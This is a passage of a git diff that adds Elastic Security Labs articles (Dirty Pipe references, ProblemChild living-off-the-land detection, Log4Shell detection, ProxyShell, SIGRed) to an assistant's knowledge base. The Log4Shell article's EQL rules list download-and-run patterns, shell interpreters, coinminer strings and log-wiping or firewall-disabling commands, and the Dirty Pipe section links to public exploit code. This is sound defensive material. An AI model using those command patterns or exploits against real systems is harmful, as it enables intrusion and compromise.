+1. Review and ensure that you have deployed the latest stable and vendor-supplied kernel for your OS’
+2. Review and implement the above detection logic within your environment using technology described in the post
+3. Maintain backups of your critical systems to aid in quick recovery
+
+## References
+
+The following research was referenced throughout the document:
+
+- Exploit CVE reference: [CVE-2022-0847](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847)
+- Write-up using eBPF for some detections: [https://sysdig.com/blog/cve-2022-0847-dirty-pipe-sysdig](https://sysdig.com/blog/cve-2022-0847-dirty-pipe-sysdig/)
+- Original Max Kellermann write-up: [https://dirtypipe.cm4all.com/](https://dirtypipe.cm4all.com/)
+- SUID shell: ​​[https://haxx.in/files/dirtypipez.c](https://haxx.in/files/dirtypipez.c)
+- Passwd overwrite: [https://github.com/liamg/traitor](https://github.com/liamg/traitor)
+- Passwd overwrite: ​​[https://github.com/imfiver/CVE-2022-0847](https://github.com/imfiver/CVE-2022-0847)
+- Metasploit module: [https://github.com/rapid7/metasploit-framework/pull/16303](https://github.com/rapid7/metasploit-framework/pull/16303)
+- Original Auditd detection logic: [https://twitter.com/jonasl/status/1501840914381258756?s=20&t=MIWwwXpl5t0JiopVxX5M5Q](https://twitter.com/jonasl/status/1501840914381258756?s=20&t=MIWwwXpl5t0JiopVxX5M5Q)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_living_off_the_land_attacks_with_new_elastic_integration.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_living_off_the_land_attacks_with_new_elastic_integration.md
new file mode 100644
index 0000000000000..a1df2f8537798
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_living_off_the_land_attacks_with_new_elastic_integration.md
@@ -0,0 +1,145 @@
+---
+title: "Detecting Living-off-the-land attacks with new Elastic Integration"
+slug: "detecting-living-off-the-land-attacks-with-new-elastic-integration"
+date: "2023-03-01"
+description: "We added a Living off the land (LotL) detection package to the Integrations app in Kibana. In a single click, you can install and start using the ProblemChild model and associated assets including anomaly detection configurations and detection rules."
+author:
+  - slug: melissa-alvarez
+image: "security-threat-hunting-incidence-response-1200x628.jpg"
+category:
+  - slug: machine-learning
+  - slug: detection-science
+---
+
+It is becoming more common that adversary attacks consist of more than a standalone executable or script. Advanced attacker techniques, like “living off the land” (LotL) that appear normal in isolation become more suspicious when observed in a parent-child context. If you are running Windows in your environment, it is important to have a system for detecting these types of attacks. Traditional heuristic-based detections, though effective in detecting a single event, often fail to generalize across a multi-step attack. At Elastic we have trained a Living off the Land classifier, anomaly detection jobs and security detection rules to help our security professionals discover LotL attacks.
+
+With the advent of [Integration packages](https://www.elastic.co/integrations/) in the Elastic stack we can now deliver the full, customizable package that includes the LotL classification model, anomaly detection job configurations, detection rules, and inference pipelines to make it easier to install and get up and running the entire end-to-end data pipeline from collecting windows events to alerting on potential Lotl attacks. We will walk you through how we set it up so you can try it yourself.
+
+# ProblemChild: Recap
+
+In an earlier blog post, we talked about how to use[the detection rules repository command line interface (CLI), to set up the ProblemChild framework and get it up and running in your environment](https://www.elastic.co/blog/problemchild-generate-alerts-to-detect-living-off-the-land-attacks). We have now added a [Living off the land (LotL) detection package](https://docs.elastic.co/integrations/problemchild) to the Integrations app in Kibana. In a single click, you can install and start using the ProblemChild model and associated assets including anomaly detection configurations and detection rules.
+
+As outlined in the [previous blog](https://www.elastic.co/blog/problemchild-generate-alerts-to-detect-living-off-the-land-attacks), ProblemChild is a framework built using the Elastic Stack to detect LotL activity. LotL attacks are generally tricky to detect, given that attackers leverage seemingly benign software already present in the target environment to fly under the radar. The lineage of processes spawned in your environment can provide a strong signal in the event of an ongoing attack.
+
+The supervised machine learning (ML) component of ProblemChild leverages process lineage information present in your Windows process event metadata to classify events as malicious or benign using [Inference](https://www.elastic.co/guide/en/machine-learning/current/ml-dfa-classification.html#ml-inference-class) at the time of ingest. Anomaly detection is then applied to detect rare processes among those detected as malicious by the supervised model. Finally, detection rules alert on rare parent-child process activity as an indication of LotL attacks.
+
+The sheer volume and variety of events seen in organizations poses a challenge for detecting LotL attacks using rules and heuristics, making an ML-based framework such as ProblemChild a great solution.
+
+## Getting Started
+
+We have released the model and the associated assets - including the pipelines, anomaly detection configurations, and detection rules - to the Integrations app in Kibana as of 8.0. We will be maintaining this format moving forward.
+
+If you don’t have an Elastic Cloud cluster but would like to start experimenting with the released ProblemChild package, you can start a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.
+
+We will now look at the steps to get ProblemChild up and running in your environment in a matter of minutes using the released Living off the land (LotL) detection package.
+
+### Step 1: Installing the package assets
+
+In Kibana, the Integrations app now includes the LotL Attack Detection package. To install the assets, click the `Install LotL Attack Detection assets` button under the `Settings` tab.
+
+This will install all of the artifacts necessary to use the ProblemChild model to generate alerts when LotL activity is detected in your environment.
+
+![To install the assets, click the `Install LotL Attack Detection assets` button under the `Settings` tab.](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/blog-elastic-living-off-the-land-attack-1.png)
+
+![To install the assets, click the `Install LotL Attack Detection assets` button under the `Settings` tab.](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/blog-elastic-detecting-lotl-attacks-2.png)
+
+Once installation is complete, you can navigate to **Stack Management > Ingest Pipelines** and see that the **`<version-number>-problem\_child\_ingest\_pipeline`** has been installed and can now be used to enrich incoming ingest data. The ingest pipeline leverages the **`<version-number>-problem\_child\_inference\_pipeline`** in order to do this.
+
+![Once installation is complete, you can navigate to Stack Management > Ingest Pipelines and see that the `<version-number>-problem_child_ingest_pipeline` has been installed and can now be used to enrich incoming ingest data.](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/blog-elastic-detecting-lotl-attacks-3.png)
+
+Similarly, the installed ProblemChild model can now be seen in **Machine Learning > Model Management > Trained Models**
+
+![Similarly, the installed ProblemChild model can now be seen in Machine Learning > Model Management > Trained Models](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/blog-elastic-detecting-lotl-attacks-4.jpg)
+
+### Step 2: Enriching your data
+
+Now you are ready to ingest your data using the ingest pipeline. This will enrich your incoming data with predictions from the machine learning model.
+
+This pipeline is designed to work with Windows process event data such as [Winlogbeat data](https://www.elastic.co/downloads/beats/winlogbeat). You can add the installed ingest pipeline to an Elastic beat by adding a simple [configuration setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats).
+
+If you already have an ingest pipeline associated with your indices, you can use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html) to integrate the ProblemChild ingest pipeline into your existing pipeline.
+
+You will also want to add the following mappings to the Elastic beat you chose:
+
+```
+{
+  "properties": {
+    "problemchild": {
+      "properties": {
+        "prediction": {
+          "type": "long"
+        },
+        "prediction_probability": {
+          "type": "float"
+        }
+      }
+    },
+    "blocklist_label": {
+      "type": "long"
+    }
+  }
+}
+
+```
+
+You can do this under **Stack Management > Index Management > Component Templates.** Templates that can be edited to add custom components will be marked with a _@custom_ suffix. Edit the _@custom_ component template for your Elastic beat by pasting the above JSON blob in the **Load JSON** flyout.
+
+![](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/Screen_Shot_2022-07-29_at_8.13.52_AM.jpeg)
+
+![](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/Screen_Shot_2022-07-29_at_8.14.10_AM.jpeg)
+
+You should now see that the model enriches incoming Windows process events with the following fields:
+
+**problemchild.prediction**
+
+- A value of 1 indicates that the event is predicted to be malicious and a value of “0” indicates that the event is predicted to be benign.
+
+**prediction_probability**
+
+- A value between 0 and 1 indicating the confidence of the model in its prediction. The higher the value, the higher the confidence.
+
+**blocklist_label**
+
+- A value of 1 indicates that the event is malicious because one or more terms in the command line arguments matched a blocklist.
+
+If you want an immediate way to test that the ingest pipeline is working as expected with your data, you can use a few sample documents with the [simulate pipeline API](https://www.elastic.co/guide/en/elasticsearch/reference/current/simulate-pipeline-api.html) and confirm you see the **problemchild** fields.
+
+### Step 3: Running anomaly detection
+
+The package includes several preconfigured anomaly detection jobs. These jobs enable you to find the rarest events among those detected as malicious by the supervised model in order to decide which events require immediate attention from your analysts.
+
+To run these jobs on your enriched data, go to **Machine Learning > Anomaly Detection**. When you create a job using the job wizard, you should see an option to Use preconfigured jobs with a card for LotL Attacks. After selecting the card, you will see several preconfigured anomaly detection jobs that can be run. Note these jobs are only useful for indices that have been enriched by the ingest pipeline.
+
+### Step 4: Enabling the rules
+
+To maximize the benefit of the ProblemChild framework, activate the installed detection rules. They are triggered when certain conditions for the supervised model or anomaly detection jobs are satisfied. The complete list of the installed rules can be found in the **Overview** page of the package itself or in the latest experimental detections [release](https://github.com/elastic/detection-rules/releases/tag/ML-experimental-detections-20211130-7).
+
+In order to enable and use the installed rules, you can navigate to **Security > Rules** and select `_Load Elastic prebuild rules and timeline templates`\_.
+
+![In order to enable and use the installed rules, you can navigate to Security > Rules and select `Load Elastic prebuild rules and timeline templates`.](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/blog-elastic-detecting-lotl-attacks-5.png)
+
+Note that there are search rules as well as ML job rules. The search rules are triggered by the supervised model, for example this rule:
+
+![The above rule matches on any Windows process event for which the supervised model or its blocklist has a prediction value of 1 (malicious).](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/blog-elastic-detecting-lotl-attacks-6.jpg)
+
+The above rule matches on any Windows process event for which the supervised model or its blocklist has a prediction value of 1 (malicious).
+
+The ML job rules are triggered by anomalies found by the anomaly detection jobs that you set up in Step 3 — for example, this rule:
+
+![The above rule is triggered each time the anomaly detection job problem_child_rare_process_by_host detects an anomaly with an anomaly score greater than or equal to 75.](/assets/images/detecting-living-off-the-land-attacks-with-new-elastic-integration/blog-elastic-detecting-lotl-attacks-6.jpg)
+
+The above rule is triggered each time the anomaly detection job problem_child_rare_process_by_host detects an anomaly with an anomaly score greater than or equal to 75.
+
+# Summary
+
+As mentioned in the first blog post, the supervised ML component of ProblemChild is trained to predict a value of 1 (malicious) on processes or command line arguments that can be used for LotL attacks. This does not mean that everything that the supervised model predicts with a value 1 indicates LotL activity. The prediction value of 1 should be interpreted more as “this could be potentially malicious,” instead of “this is definitely LotL activity.”
+
+The real beauty of ProblemChild is in the anomaly detection, wherein it surfaces rare parent-child process relationships from among the events the supervised model marked as suspicious. This not only helps in reducing the number of false positives, but also helps security analysts focus on a smaller, more targeted list for triage.
+
+You could of course start with the search rules, which will alert directly on the results of the supervised model. If the number of alerts from these rules is manageable and you have the time and resources to drill into these alerts, you might not need to enable the anomaly detection jobs. However, if you then notice that these rules are producing too many alerts (which is usually the case in most large organizations), you may benefit from enabling the anomaly detection jobs and their corresponding rules.
+
+# Get in touch with us
+
+We’d love for you to try out ProblemChild and give us feedback as we work on adding new capabilities to it. If you run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack), [discussion forums](https://discuss.elastic.co/c/security) or even our [open detections repository](https://github.com/elastic/detection-rules).
+
+You can always experience the latest version of [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud and follow along with this blog to set up the ProblemChild framework in your environment for your Windows process event data. And take advantage of our [Quick Start training](https://www.elastic.co/training/elastic-security-quick-start) to set yourself up for success. Happy experimenting!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_log4j2_with_elastic_security.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_log4j2_with_elastic_security.md
new file mode 100644
index 0000000000000..870296b5eedb6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_log4j2_with_elastic_security.md
@@ -0,0 +1,310 @@
+---
+title: "Detecting Exploitation of CVE-2021-44228 (Log4j2) with Elastic Security"
+slug: "detecting-log4j2-with-elastic-security"
+date: "2022-11-22"
+description: "This blog post provides a summary of CVE-2021-44228 and provides Elastic Security users with detections to find active exploitation of the vulnerability in their environment. Further updates will be provided to this post as we learn more."
+author:
+  - slug: jake-king
+  - slug: samir-bousseaden
+image: "blog-security-detection-720x420.png"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+---
+
+> - _To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisory_[_here._](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476)
+> - _This blog has been updated (Dec. 17, 2021) with further detection and hunting improvements since its initial publish._
+
+## Overview
+
+This blog post provides a summary of CVE-2021-44228 and provides Elastic Security users with detections to find active exploitation of the vulnerability in their environment.
+
+Further updates will be provided to this post as we learn more. This version is accurate as of Tuesday, December 14, 2021. Updates from Apache may be investigated directly via the [security page](https://logging.apache.org/log4j/2.x/security.html#) for Log4j2.
+
+## Summary of CVE-2021-44228 (Log4Shell)
+
+Log4j2 is an open source logging framework incorporated into many Java based applications on both end-user systems and servers. In [late November 2021](https://logging.apache.org/log4j/2.x/security.html#), Chen Zhaojun of Alibaba identified a remote code execution vulnerability, ultimately being reported under the CVE ID : [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228), released to the public on December 10, 2021. The vulnerability is exploited through improper deserialization of user-input passed into the framework. It permits remote code execution and it can allow an attacker to leak sensitive data, such as environment variables, or execute malicious software on the target system.
+
+The identified vulnerability impacts all versions of Log4j2 from version 2.0-beta9 to version 2.14.1. Early methods to patch the issue resulted in a number of release candidates, culminating in recommendations to upgrade the framework to Log4j2 2.15.0-rc2 at the time of this post.
+
+Given the trivial complexity and the nature of observed widespread exploitation, mitigation should be considered critical in any environment that has identified software leveraging vulnerable versions of Log4j2.
+
+## Detecting Exploitation of Log4Shell in Elastic Security
+
+Elastic Security users can use the following Event Correlation detection rule to identify active exploitation of the Log4j2 vulnerability. Depending on the format of the host based event data you may need to modify this detection to match your data fields.
+
+**Detection Rule when using Endpoint data**
+
+```
+sequence by host.id with maxspan=1m
+ [network where event.action == "connection_attempted" and
+  process.name : "java" and
+  /*
+     outbound connection attempt to
+     LDAP, RMI or DNS standard ports
+     by JAVA process
+   */
+  destination.port in (1389, 389, 1099, 53, 5353)] by process.pid
+ [process where event.type == "start" and
+
+  /* Suspicious JAVA child process */
+  process.parent.name : "java" and
+   process.name : ("sh",
+                   "bash",
+                   "dash",
+                   "ksh",
+                   "tcsh",
+                   "zsh",
+                   "curl",
+                   "perl*",
+                   "python*",
+                   "ruby*",
+                   "php*",
+                   "wget")] by process.parent.pid
+```
+
+**Detection Rule when using Auditbeat data**
+
+```
+sequence by agent.id with maxspan=1m
+ [network where event.action == "connected-to" and
+  process.name : "java" and
+  /*
+     outbound connection attempt to
+     LDAP, RMI or DNS standard ports
+     by JAVA process
+   */
+  destination.port in (1389, 389, 1099, 53, 5353)] by process.pid
+ [process where event.type == "start" and
+
+  /* Suspicious JAVA child process */
+  process.parent.name : "java" and
+   process.name : ("sh",
+                   "bash",
+                   "dash",
+                   "ksh",
+                   "tcsh",
+                   "zsh",
+                   "curl",
+                   "perl*",
+                   "python*",
+                   "ruby*",
+                   "php*",
+                   "wget")] by process.parent.pid
+```
+
+**Detection rule when using Endgame streamed events**
+
+```
+sequence by agent.id with maxspan=1m
+ [network where event.category == "network" and
+  process.name : "java" and
+  /*
+     outbound connection attempt to
+     LDAP, RMI or DNS standard ports
+     by JAVA process
+   */
+  destination.port in (1389, 389, 1099, 53, 5353)] by process.pid
+ [process where event.type == "start" and
+
+  /* Suspicious JAVA child process */
+  process.parent.name : "java" and
+   process.name : ("sh",
+                   "bash",
+                   "dash",
+                   "ksh",
+                   "tcsh",
+                   "zsh",
+                   "curl",
+                   "perl*",
+                   "python*",
+                   "ruby*",
+                   "php*",
+                   "wget")] by process.parent.pid
+```
+
+This detection rule looks for a sequence of an outbound connection attempt to standard ports for LDAP, RMI and DNS (often abused via recently observed [JAVA/JNDI](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf) injection attacks) followed by a child process of the same Java process instance.
+
+Now, let’s demonstrate how this rule detects exploitation of the log42j vulnerability:
+
+![The screenshot above shows an attacker exploiting the vulnerability with a base-64 encoded payload](/assets/images/detecting-log4j2-with-elastic-security/blog-elastic-security-1.jpg)
+
+The screenshot above shows an attacker exploiting the vulnerability with a base-64 encoded payload targeting an [example vulnerable application](https://github.com/christophetd/log4shell-vulnerable-app) created by [Christophe Tafani-Dereeper](https://github.com/christophetd).
+
+![This screenshot shows the detection of the active exploitation of CVE-2021-44228 within Elastic Security detailing both the alert and timeline view of the exploit.](/assets/images/detecting-log4j2-with-elastic-security/blog-elastic-security-2.jpg)
+
+This screenshot shows the detection of the active exploitation of CVE-2021-44228 within Elastic Security detailing both the alert and timeline view of the exploit.
+
+![The screenshot above shows in the investigation of the detection alert that Java executed a shell script to download and run a bash script.](/assets/images/detecting-log4j2-with-elastic-security/blog-elastic-security-3.jpg)
+
+The screenshot above shows in the investigation of the detection alert that Java executed a shell script to download and run a bash script.
+
+## Update: Detection & hunting improvements
+
+**Suspicious Shell Commands Execution via Java**
+
+Based on observed publicly known malicious Java classes served via log4j exploit, you can hunt for suspicious shell scripts and ingress tool transfer commands:
+
+```
+process where event.type == "start" and
+  process.parent.name : "java*" and
+
+  /* Ingress tools transfer via common shell command interpreters */
+
+  /* linux or macos */
+  (
+   (process.name : ("sh", "bash", "python*") and
+    process.command_line : ("*curl*|*sh*", "*wget*|*bash", "*curl*|*bash*", "*curl*|*bash*", "*http*|*sh*", "*python*http*")) or
+
+  /* windows */
+  (process.name : ("powershell.exe", "pwsh.exe", "cmd.exe") and
+   process.command_line : ("*.downloadstring*", "*.downloadfile*", "*.downloaddata*", "*BitsTransfer*", "* -enc*", "* IEX*", "*wp-content*", "*wp-admin*", "*wp-includes*", "*$*$*$*$*$*", "*^*^*^*^*^*^*^*^*^*", "*.replace*", "*start-process*", "*http*", "*cmd*powershell*")))
+```
+
+**Untrusted File Execution via JAVA**
+
+Identifies when a JAVA interpreter creates an executable file (PE/ELF) and the file is subsequently executed.
+
+**Detection Rule when using Endpoint data**
+
+```
+sequence by host.id with maxspan=5m
+ [ file where event.type != "deletion" and
+  process.name : ("java", "java.exe", "javaw.exe") and
+
+  (file.extension : ("exe", "com", "pif", "scr") or
+      /* Match Windows PE files by header data (MZ) */
+  file.Ext.header_bytes : ("4d5a*", "7f454c46*")) and
+
+  not file.path :  ("?:\\Program Files\\*",
+                    "?:\\Program Files (x86)\\*") ] by file.path
+ [ process where event.type == "start" and
+  not process.code_signature.trusted == true ] by process.executable
+```
+
+**Detection rule when using Endgame streamed events**
+
+```
+sequence by agent.id with maxspan=5m
+  [ file where event.type != "deletion"
+    process.name : ("java", "java.exe", "javaw.exe")] by file_path
+  [ process where event.type == "start" and
+  not process.code_signature.trusted == true] by process_path
+```
+
+**Potential CoinMiner activity**
+
+Process with command line common to cryptocurrency miner (most observed campaigns leveraging log4j exploit are coinminers):
+
+```
+process where event.type == "start" and
+ process.command_line :
+       ("* pool.*", "*-u*--coin*", "*.xmr.*", "*.xmr1.*",
+        "*stratum*", "*elitter.net*", "*cryptonight*",
+        "*-a scrypt*", "*stratum1*", "*-userpass*", "*-max-cpu-usage*",
+	  "*qhor.net*", "*-wallet*pool*", "*--donate-level*", "*supportxmr.com*")
+```
+
+Other relevant post exploitation detections :
+
+[Attempt to Disable IPTables or Firewall](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml)
+
+[Tampering of Bash Command-Line History](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml)
+
+[System Log File Deletion](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_log_files_deleted.toml)
+
+[Potential Reverse Shell Activity via Terminal](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/execution_revershell_via_shell_cmd.toml)
+
+[Suspicious JAVA Child Process](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/execution_suspicious_jar_child_process.toml)
+
+[Attempt to Disable Syslog Service](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml)
+
+## Elastic Endgame EQL Queries
+
+**Suspicious Java Netcon followed by Unusual Child Process**
+
+```
+sequence with maxspan=5s
+ [network where process_name == "java*" and destination_port in (1389, 389, 1099, 53, 5353) and
+  destination_address != "127.0.0.1" and not destination_address == "::1"] by pid
+ [process where opcode in (1,5) and
+  /* Suspicious JAVA child process */
+  parent_process_name == "java*" and
+   process_name in ("sh", "bash", "dash", "ksh", "tcsh", "zsh", "curl", "perl*", "python*", "ruby*", "php*", "wget", "powershell.exe", "cmd.exe")] by ppid
+```
+
+**Suspicious Shell Commands Execution via Java**
+
+```
+process where opcode in (1,5) and
+  parent_process_name == "java*" and
+  /* Ingress tools transfer via common shell command interpreters */
+
+  /* linux or macos */
+ (
+  (process_name in ("sh", "bash", "python") and
+   wildcard(command_line, "*curl*|*sh*", "*wget*|*bash", "*curl*|*bash*", "*curl*|*bash*", "*http*|*sh*", "*python*http*")) or
+  /* windows */
+  (process_name in ("powershell.exe", "pwsh.exe", "cmd.exe") and
+   wildcard(command_line,"*.downloadstring*", "*.downloadfile*", "*.downloaddata*", "*BitsTransfer*", "* -enc*", "* IEX*", "*wp-content*", "*wp-admin*", "*wp-includes*", "*$*$*$*$*$*", "*^*^*^*^*^*^*^*^*^*","*.replace*", "*start-process*", "*http*", "*cmd*powershell*")))
+```
+
+**Common Coin Miners as a descendant of JAVA**
+
+```
+process where opcode in (1, 3, 4, 5) and
+ descendant of [process where opcode in (1, 3, 4, 5) and process_name == "java*"] and
+ wildcard(command_line, "* pool.*", "*-u*--coin*", "*.xmr.*", "*.xmr1.*", "*stratum*", "*elitter.net*", "*cryptonight*", "*-a scrypt*", "*stratum1*",
+"*-userpass*", "*-max-cpu-usage*", "*qhor.net*", "*-wallet*pool*",  "*--donate-level*", "*supportxmr.com*",
+/* evasion commands */
+"*base64*", "*history -c*", "*ld.so.preload*", "*nmi_watchdog*", "*ufw*disable*", "*.bash_history*", "*chmod*+x*",
+"*tor2web*", "*kill*-9*", "*python*-c*http*")
+```
+
+**Untrusted File Execution via JAVA**
+
+```
+sequence with maxspan=2m
+  [ file where opcode != 2 and file_name == "*.exe" and process_name == "java*"] by file_path
+  [ process where opcode in (1,5)] by process_path
+```
+
+## Community Detections
+
+A number of community members discussing widespread exploitation of the vulnerability have provided insights into a number of early detection methods that analysts may leverage to identify if systems they are using have been exploited or are under active exploitation:
+
+- A series of [payloads](https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890) have been shared by the [GreyNoise team](https://twitter.com/GreyNoiseIO/status/1469430126819618821), including payloads containing both encoded and decoded variants for analysts looking to explore logs stored within their systems. This has been complemented with a list of initial [tagged IPs](https://twitter.com/GreyNoiseIO/status/1469334738225741832) attempting exploitation of the vulnerability.
+
+- [Florian Roth of Nextron Systems](https://twitter.com/cyb3rops/status/1469243580929740802?s=21) has provided a [series of checks](https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b) for local exploitation using grep / zgrep, alongside some initial YARA signatures in a Gist listed on his Github account. Florian also shared a method for generating [Thinkst](https://canarytokens.org/generate#) [CanaryTokens](https://twitter.com/cyb3rops/status/1469405846010572816) to test systems you may manage for exploitability.
+
+- [Rob Fuller (Mubix)](https://twitter.com/mubix) has shared a list of known file hashes for vulnerable versions of the framework, [here](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes).
+
+## Additional Mitigation Strategies
+
+Outside of the recommended guidance from the Apache team regarding the deployment of the latest, patched versions of the Log4j2 framework to update, a number of mitigations have been widely suggested to prevent exploitation:
+
+- [Fastly](https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j) have suggested checking if your version of Log4j supports executing the JVM with JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true to disable the lookup functionality to the remote server. This should apply to versions 2.10.0 through 2.15.0.
+
+- To prevent lateral movement from a vulnerable host, or exploitation over the network, limiting connectivity from potentially vulnerable systems to external resources to trusted applications and / or services is recommended.
+
+## Thank you, from Elastic Security.
+
+We want to thank all of the security teams across the globe for your tireless work today and through the weekend, especially those of you listed in this post. Openness and collaboration in the security community to safeguard all users is paramount when facing such a serious and pervasive vulnerability. We want you to know we are here with you every step of the way.
+
+Existing Elastic Security can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration). Or [download](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free.
+
+## Reference Material
+
+[https://www.lunasec.io/docs/blog/log4j-zero-day/](https://www.lunasec.io/docs/blog/log4j-zero-day/)
+
+[https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability](https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability)
+
+[https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/](https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/)
+
+[https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
+
+[https://www.greynoise.io/viz/query/?gnql=CVE-2021-44228](https://www.greynoise.io/viz/query/?gnql=CVE-2021-44228)
+
+[https://logging.apache.org/log4j/2.x/security.html#](https://logging.apache.org/log4j/2.x/security.html#)
+
+[https://github.com/christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detection_and_response_for_the_actively_exploited_proxyshell_vulnerabilities.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detection_and_response_for_the_actively_exploited_proxyshell_vulnerabilities.md
new file mode 100644
index 0000000000000..8299cbf96b164
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detection_and_response_for_the_actively_exploited_proxyshell_vulnerabilities.md
@@ -0,0 +1,18 @@
+---
+title: "Detection and response for the actively exploited ProxyShell vulnerabilities"
+slug: "detection-and-response-for-the-actively-exploited-proxyshell-vulnerabilities"
+date: "2022-06-02"
+description: "In the last week, Elastic Security has observed the exploitation of Microsoft Exchange vulnerabilities associated with ProxyShell. Review the post to find newly released details about this activity."
+author:
+  - slug: daniel-stepanic
+  - slug: andrew-pease
+image: "blog-thumb-blind-spots.png"
+category:
+  - slug: security-research
+---
+
+On August 21, 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released an urgent [notice](https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell) related to the exploitation of ProxyShell vulnerabilities ([CVE-2021-31207](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207), [CVE-2021-34473](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473), [CVE-2021-34523](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523)). By chaining these vulnerabilities together, threat actors are compromising unpatched Microsoft Exchange servers and gaining footholds into enterprise networks. [Security vendors](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows) and [researchers](https://twitter.com/KyleHanslovan/status/1428804893423382532?s=20) are also observing these attacks tied to post-exploitation behavior such as deploying ransomware to victim environments.
+
+Elastic Security identified indicators of compromise (IoCs) indicating similar activity as reported by the industry. The details of this activity can be found in our Discuss forum, highlighting our perspective of what we have observed in our own telemetry.
+
+Please visit the [Discuss forum](https://discuss.elastic.co/t/detection-and-response-for-proxyshell-activity/282407) for full details on our identified IoCs.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detection_rules_for_sigred_vulnerability.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detection_rules_for_sigred_vulnerability.md
new file mode 100644
index 0000000000000..8a53bf62a4158
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detection_rules_for_sigred_vulnerability.md
@@ -0,0 +1,118 @@
+---
+title: "Detection rules for SIGRed vulnerability"
+slug: "detection-rules-for-sigred-vulnerability"
+date: "2022-11-22"
+description: "The SIGRed vulnerability impacts all systems leveraging the Windows DNS server service (Windows 2003+). To defend your environment, we recommend implementing the detection logic included in this blog post using technology like Elastic Security."
+author:
+  - slug: seth-goodwin
+  - slug: daniel-stepanic
+  - slug: justin-ibarra
+  - slug: andrew-pease
+image: "blog-thumb-security-laptop.png"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+tags:
+  - sigred
+  - cve-2020-1350
+---
+
+> To defend your environment from the SIGRed vulnerability, we recommend implementing the detection logic included below into your environment using technology such as [Endpoint security](https://www.elastic.co/endpoint-security/), [Winlogbeat](https://www.elastic.co/beats/winlogbeat), [Packetbeat](https://www.elastic.co/beats/packetbeat), or [network security monitoring (NSM)](https://www.elastic.co/training/network-security-monitoring-engineer) platforms such as Zeek or Suricata.
+
+## Executive summary
+
+On July 14, 2020, Microsoft released a [security update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) related to a remote code execution (RCE) and denial of service (DoS) vulnerability ([CVE-2020-1350](https://nvd.nist.gov/vuln/detail/CVE-2020-1350)) in Windows DNS Server (2003 - 2019).
+
+### Summary
+
